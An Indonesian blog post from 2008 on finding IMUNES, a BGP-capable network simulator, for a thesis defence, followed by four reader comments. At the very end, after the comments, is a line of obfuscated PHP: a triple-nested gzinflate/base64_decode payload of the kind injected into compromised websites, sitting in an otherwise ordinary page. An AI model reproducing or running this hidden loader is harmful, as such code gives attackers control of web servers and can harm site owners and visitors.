Delicious

Archives

Categories

BGP Simulator

  ozzie / 10/07/2008


Bab 5 udah selesai.. tinggal acc Sidang [-o<[-o<[-O<

sekian lama googling mencari Network Simulator yang support BGP.. akhirnya dapet juga: IMUNES <:-p<:-p.

Dari Sekian banyak Network Simulator seperti: Boson NetSim, Packet Tracer, dynamips, dll.. Kayaknya baru IMUNES yang bisa advertise IP :) (CMIIW) .. lumayanlah..:">:">.. dari pada harus bawa-router waktu sidang ;)) sedangkan prototype ama konsepnya lumayan ribet.. minimal kalo di itung-itung butuh 9 router yang support BGP.. minimal Cisco 3600.. kalo pake pc-based lebih capek lagih8-}.. kudu install router engine dulu..

Sayangnya inih IMUNES running di FreeBSD 4.11-RELEASE. bantai dulu deh Slackware di laptop :">:">


« »


4 Responses to “BGP Simulator”

  1. KieN Says:

    anjrit!! … bab 5 aja loch…;))

  2. ferry Says:

    bos ada yang buat versi windows nya ndak yah????

    good info bro :)

    http://www.ferrylesmana.co.cc

  3. fungmen Says:

    bro yang versi slackware ada gak ? sayang kalo uninstall ke bsd os :(
    please bro g juga lagi nyusun tangga eh salah skripsi buat sidang di pengadilan agama (just joke) :)

  4. Dhoto Says:

    NS2, Qualnet ,…


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>